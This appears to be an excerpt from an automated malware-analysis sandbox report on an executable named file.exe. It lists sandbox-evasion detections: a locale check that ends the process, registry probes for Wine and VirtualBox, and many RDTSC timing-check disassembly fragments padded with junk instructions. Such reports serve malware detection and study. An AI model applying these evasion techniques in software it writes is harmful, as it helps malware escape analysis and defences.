                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37938
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD837 second address: FFD840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD840 second address: FFD844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1A0A second address: FF1A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1A10 second address: FF1A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1A14 second address: FF1A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB474E5AC21h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC855 second address: FFC87A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB474DDA566h 0x00000008 jp 00007FB474DDA566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB474DDA56Ah 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop esi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFCCBB second address: FFCCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD134 second address: FFD15B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB474DDA578h 0x0000000a jo 00007FB474DDA566h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF95F second address: FFF964 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF9C6 second address: FFF9CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFB90 second address: FFFB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFB95 second address: FFFBD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4A0E374Dh 0x0000000f and dh, FFFFFFA3h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+122D215Dh], ebx 0x0000001c mov dword ptr [ebp+122D21AEh], ecx 0x00000022 push 00000003h 0x00000024 sub dword ptr [ebp+122D17B7h], edx 0x0000002a add dword ptr [ebp+122D22C4h], eax 0x00000030 call 00007FB474DDA569h 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007FB474DDA568h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFBD8 second address: FFFC1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007FB474E5AC2Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC1A second address: FFFC82 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB474DDA566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jne 00007FB474DDA56Ch 0x00000014 push ebx 0x00000015 jl 00007FB474DDA566h 0x0000001b pop ebx 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push esi 0x00000023 jns 00007FB474DDA566h 0x00000029 pop esi 0x0000002a jg 00007FB474DDA572h 0x00000030 popad 0x00000031 pop eax 0x00000032 jc 00007FB474DDA56Ch 0x00000038 lea ebx, dword ptr [ebp+124458C0h] 0x0000003e ja 00007FB474DDA56Ch 0x00000044 mov edi, dword ptr [ebp+122D36F9h] 0x0000004a xchg eax, ebx 0x0000004b push esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pop edi 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFCF4 second address: FFFCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFCFA second address: FFFD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB474DDA576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFD14 second address: FFFD6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB474E5AC22h 0x0000000f jmp 00007FB474E5AC1Ch 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FB474E5AC18h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 adc edi, 0A760FCFh 0x00000037 push 624CF9FDh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jc 00007FB474E5AC16h 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFD6A second address: FFFE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 624CF97Dh 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FB474DDA568h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov esi, 40E4ABE6h 0x0000002f mov ch, dh 0x00000031 push 00000003h 0x00000033 mov dword ptr [ebp+122D27E9h], edx 0x00000039 sub dword ptr [ebp+122D2911h], ecx 0x0000003f push 00000000h 0x00000041 sbb di, D5C8h 0x00000046 push 00000003h 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007FB474DDA568h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 sub dword ptr [ebp+122D35BFh], esi 0x00000068 call 00007FB474DDA569h 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jp 00007FB474DDA566h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE01 second address: FFFE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE06 second address: FFFE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB474DDA572h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 jl 00007FB474DDA579h 0x0000001a jmp 00007FB474DDA573h 0x0000001f pop edx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB474DDA56Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE64 second address: FFFEE2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB474E5AC18h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FB474E5AC1Bh 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB474E5AC18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 sbb esi, 5CD871CDh 0x00000036 mov cx, 6E2Bh 0x0000003a lea ebx, dword ptr [ebp+124458CBh] 0x00000040 call 00007FB474E5AC1Fh 0x00000045 mov di, bx 0x00000048 pop ecx 0x00000049 xchg eax, ebx 0x0000004a jp 00007FB474E5AC24h 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FB474E5AC1Ah 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFEE2 second address: FFFEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFEE8 second address: FFFEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021093 second address: 10210E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474DDA56Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FB474DDA574h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FB474DDA572h 0x0000001a jmp 00007FB474DDA56Eh 0x0000001f jo 00007FB474DDA572h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10210E9 second address: 10210EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF4E second address: 101EF59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FB474DDA566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF59 second address: 101EF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB474E5AC1Ch 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jmp 00007FB474E5AC28h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF8F second address: 101EF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F0DF second address: 101F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F0EA second address: 101F10F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB474DDA578h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F3DD second address: 101F3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F528 second address: 101F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474DDA576h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB474DDA577h 0x00000010 jo 00007FB474DDA566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F6CA second address: 101F6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC2C second address: 101FC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC33 second address: 101FC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB474E5AC1Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020020 second address: 1020026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020026 second address: 102004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC25h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FB474E5AC16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102004A second address: 102004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102004E second address: 102006C instructions: 0x00000000 rdtsc 0x00000002 je 00007FB474E5AC16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FB474E5AC16h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102006C second address: 10200B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB474DDA570h 0x0000000f jmp 00007FB474DDA574h 0x00000014 jng 00007FB474DDA566h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8532 second address: FF854C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB474E5AC16h 0x00000008 js 00007FB474E5AC16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jnp 00007FB474E5AC16h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207F6 second address: 10207FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207FA second address: 102080A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102080A second address: 1020810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020810 second address: 1020814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102098D second address: 10209B1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB474DDA57Bh 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020C34 second address: 1020C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB474E5AC29h 0x0000000a popad 0x0000000b push ebx 0x0000000c jng 00007FB474E5AC1Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6A1C second address: FF6A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6A22 second address: FF6A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B43F second address: 102B443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B443 second address: 102B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FB474E5AC18h 0x00000011 pushad 0x00000012 jp 00007FB474E5AC16h 0x00000018 jnl 00007FB474E5AC16h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B76E second address: 102B774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBB6 second address: 102BBC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB474E5AC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBC5 second address: 102BBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBCE second address: 102BBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBD2 second address: 102BBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE88 second address: 102BE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE98 second address: 102BEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jnl 00007FB474DDA584h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007FB474DDA566h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DC0F second address: 102DC2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FB474E5AC20h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCD7 second address: 102DCDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCDD second address: 102DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCE1 second address: 102DD2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB474DDA566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 7F97B806h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FB474DDA568h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push ebx 0x0000002e or esi, dword ptr [ebp+122D37A9h] 0x00000034 pop esi 0x00000035 push 8D93DBFEh 0x0000003a jg 00007FB474DDA570h 0x00000040 pushad 0x00000041 push edi 0x00000042 pop edi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E801 second address: 102E805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E805 second address: 102E80B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E80B second address: 102E844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB474E5AC25h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E9E0 second address: 102E9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EAE9 second address: 102EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EE56 second address: 102EE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F3C8 second address: 102F3CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E7F second address: 1030E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA56Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10306A2 second address: 10306AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB474E5AC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E8D second address: 1030E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030E92 second address: 1030F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ecx 0x0000000d mov dword ptr [ebp+1244D83Bh], eax 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB474E5AC18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 js 00007FB474E5AC16h 0x00000036 sub esi, dword ptr [ebp+122D3829h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FB474E5AC18h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D186Dh], edx 0x0000005e jnp 00007FB474E5AC2Ch 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 push eax 0x00000069 pop eax 0x0000006a pop esi 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030F1E second address: 1030F35 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4752141B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FB4752141C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
